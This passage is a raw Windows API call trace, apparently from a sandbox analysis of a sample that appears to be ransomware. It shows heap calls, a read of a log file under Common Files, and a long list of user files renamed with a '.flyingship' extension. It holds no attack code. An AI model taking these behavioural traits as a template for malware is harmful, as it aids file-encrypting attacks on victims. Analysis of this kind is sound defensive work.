HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.flyingship.mkv\r\n") returned 16402 [0248.393] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4128 | out: hHeap=0xbe0000) returned 1 [0248.393] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8030) returned 0xe90be0 [0248.393] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe88bb0 | out: hHeap=0xbe0000) returned 1 [0248.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe80bb8 | out: hHeap=0xbe0000) returned 1 [0248.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52710 | out: hHeap=0xbe0000) returned 1 [0248.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4008 | out: hHeap=0xbe0000) returned 1 [0248.394] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8030) returned 0xe7abc8 [0248.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe90be0 | out: hHeap=0xbe0000) returned 1 [0248.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52700 | out: hHeap=0xbe0000) returned 1 [0248.394] CloseHandle (hObject=0x5fc) returned 1 [0248.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4068 | out: hHeap=0xbe0000) returned 1 [0248.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526e0 | out: hHeap=0xbe0000) returned 1 [0248.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe6abc0 | out: hHeap=0xbe0000) returned 1 [0248.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe33dd0 | out: hHeap=0xbe0000) returned 1 [0248.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01610 | out: hHeap=0xbe0000) returned 1 [0248.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526d0 | out: hHeap=0xbe0000) returned 1 [0248.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3df8 | out: hHeap=0xbe0000) returned 1 [0248.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf3e28 | out: hHeap=0xbe0000) returned 1 [0248.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d418 | out: hHeap=0xbe0000) returned 1 [0248.394] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526c0 | out: hHeap=0xbe0000) returned 1 [0248.394] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d418 [0248.394] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3e28 [0248.394] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526c0 [0248.395] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf3df8 [0248.395] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4068 [0248.395] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4098 | out: hHeap=0xbe0000) returned 1 [0248.395] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.395] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d3f0 [0248.395] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4098 [0248.395] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526d0 [0248.395] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526e0 [0248.395] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526e0 | out: hHeap=0xbe0000) returned 1 [0248.395] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526d0 | out: hHeap=0xbe0000) returned 1 [0248.395] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4008 [0248.395] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526d0 [0248.395] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4128 [0248.395] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526e0 [0248.395] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xd01010 [0248.395] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52700 [0248.395] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d468 [0248.395] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0248.395] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d468 | out: hHeap=0xbe0000) returned 1 [0248.395] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52700 | out: hHeap=0xbe0000) returned 1 [0248.395] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d468 [0248.395] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xe52700 [0248.395] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d440 [0248.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4158 [0248.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52710 [0248.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4170 [0248.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526f0 [0248.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40af0 [0248.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4200 [0248.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52760 [0248.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01610 [0248.396] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4200 | out: hHeap=0xbe0000) returned 1 [0248.396] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40af0 | out: hHeap=0xbe0000) returned 1 [0248.396] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526f0 | out: hHeap=0xbe0000) returned 1 [0248.396] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52710 | out: hHeap=0xbe0000) returned 1 [0248.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf4200 [0248.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d4b8 [0248.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4140 [0248.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52710 [0248.396] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4140 | out: hHeap=0xbe0000) returned 1 [0248.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d490 [0248.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4140 [0248.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41d0 [0248.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01658 [0248.396] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0248.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d580 [0248.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41e8 [0248.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526f0 [0248.397] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41e8 | out: hHeap=0xbe0000) returned 1 [0248.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d558 [0248.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41e8 [0248.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41a0 [0248.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52750 [0248.397] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41a0 | out: hHeap=0xbe0000) returned 1 [0248.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5f8 [0248.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41a0 [0248.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52780 [0248.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41b8 [0248.397] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52780 | out: hHeap=0xbe0000) returned 1 [0248.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4248 [0248.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52780 [0248.397] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52780 | out: hHeap=0xbe0000) returned 1 [0248.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x38) returned 0xe33dd0 [0248.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10000) returned 0xe6abc0 [0248.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4260 [0248.397] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52780 [0248.397] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5fc [0248.398] SetFilePointerEx (in: hFile=0x5fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.398] SetFilePointerEx (in: hFile=0x5fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf08c | out: lpNewFilePointer=0x0) returned 1 [0248.398] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52740 [0248.398] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10000) returned 0xe82c00 [0248.398] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52770 [0248.398] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52740 | out: hHeap=0xbe0000) returned 1 [0248.398] SetFilePointerEx (in: hFile=0x5fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf09c | out: lpNewFilePointer=0x0) returned 1 [0248.398] ReadFile (in: hFile=0x5fc, lpBuffer=0xe6abc0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf0c4, lpOverlapped=0x0 | out: lpBuffer=0xe6abc0*, lpNumberOfBytesRead=0x8bf0c4*=0x4011, lpOverlapped=0x0) returned 1 [0248.398] ReadFile (in: hFile=0x5fc, lpBuffer=0xe6abc0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf0c4, lpOverlapped=0x0 | out: lpBuffer=0xe6abc0*, lpNumberOfBytesRead=0x8bf0c4*=0x0, lpOverlapped=0x0) returned 1 [0248.398] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52770 | out: hHeap=0xbe0000) returned 1 [0248.398] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe82c00 | out: hHeap=0xbe0000) returned 1 [0248.398] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d620 [0248.398] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf40c8 [0248.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52770 [0248.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d530 [0248.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52740 [0248.399] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41b8 | out: hHeap=0xbe0000) returned 1 [0248.399] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41a0 | out: hHeap=0xbe0000) returned 1 [0248.399] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4248 | out: hHeap=0xbe0000) returned 1 [0248.399] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5f8 | out: hHeap=0xbe0000) returned 1 [0248.399] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52750 | out: hHeap=0xbe0000) returned 1 [0248.399] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0248.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52750 [0248.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52790 [0248.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52730 [0248.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40af0 [0248.399] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52730 | out: hHeap=0xbe0000) returned 1 [0248.399] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40af0 | out: hHeap=0xbe0000) returned 1 [0248.399] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52790 | out: hHeap=0xbe0000) returned 1 [0248.399] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52750 | out: hHeap=0xbe0000) returned 1 [0248.399] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0248.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5f8 [0248.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4248 [0248.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52750 [0248.399] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4248 | out: hHeap=0xbe0000) returned 1 [0248.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5a8 [0248.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4248 [0248.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41a0 [0248.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52790 [0248.400] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41a0 | out: hHeap=0xbe0000) returned 1 [0248.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5d0 [0248.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41a0 [0248.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52730 [0248.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d648 [0248.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41b8 [0248.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe527a0 [0248.400] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527a0 | out: hHeap=0xbe0000) returned 1 [0248.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4188 [0248.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4218 [0248.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527a0 [0248.400] SetFilePointerEx (in: hFile=0x5fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.400] SetFilePointerEx (in: hFile=0x5fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8befc0 | out: lpNewFilePointer=0x0) returned 1 [0248.400] SetFilePointerEx (in: hFile=0x5fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.400] SetFilePointerEx (in: hFile=0x5fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8befc0 | out: lpNewFilePointer=0x0) returned 1 [0248.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4230 [0248.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52840 [0248.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4278 [0248.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52720 [0248.401] SetFilePointerEx (in: hFile=0x5fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8befa4 | out: lpNewFilePointer=0x0) returned 1 [0248.401] ReadFile (in: hFile=0x5fc, lpBuffer=0xe6abc0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8befcc, lpOverlapped=0x0 | out: lpBuffer=0xe6abc0*, lpNumberOfBytesRead=0x8befcc*=0x4011, lpOverlapped=0x0) returned 1 [0248.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe51280 [0248.401] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4278 | out: hHeap=0xbe0000) returned 1 [0248.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x70) returned 0xdffa58 [0248.401] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe51280 | out: hHeap=0xbe0000) returned 1 [0248.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xf0) returned 0xdf1018 [0248.401] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdffa58 | out: hHeap=0xbe0000) returned 1 [0248.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1f0) returned 0xe636b8 [0248.401] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf1018 | out: hHeap=0xbe0000) returned 1 [0248.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x3f0) returned 0xe638b0 [0248.401] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe636b8 | out: hHeap=0xbe0000) returned 1 [0248.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x7f0) returned 0xe611e0 [0248.401] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe638b0 | out: hHeap=0xbe0000) returned 1 [0248.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xff0) returned 0xe533c8 [0248.401] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe611e0 | out: hHeap=0xbe0000) returned 1 [0248.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1ff0) returned 0xe82c00 [0248.401] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533c8 | out: hHeap=0xbe0000) returned 1 [0248.402] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x3ff0) returned 0xe84bf8 [0248.402] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe82c00 | out: hHeap=0xbe0000) returned 1 [0248.402] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x7ff0) returned 0xe88bf0 [0248.402] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe84bf8 | out: hHeap=0xbe0000) returned 1 [0248.402] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0xe88bf0, cbMultiByte=16402, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16402 [0248.402] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8024) returned 0xe90be8 [0248.402] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0xe88bf0, cbMultiByte=16402, lpWideCharStr=0xe90be8, cchWideChar=16402 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.flyingship.ppt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bQ9gmgo1CPU5L0JTf.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS 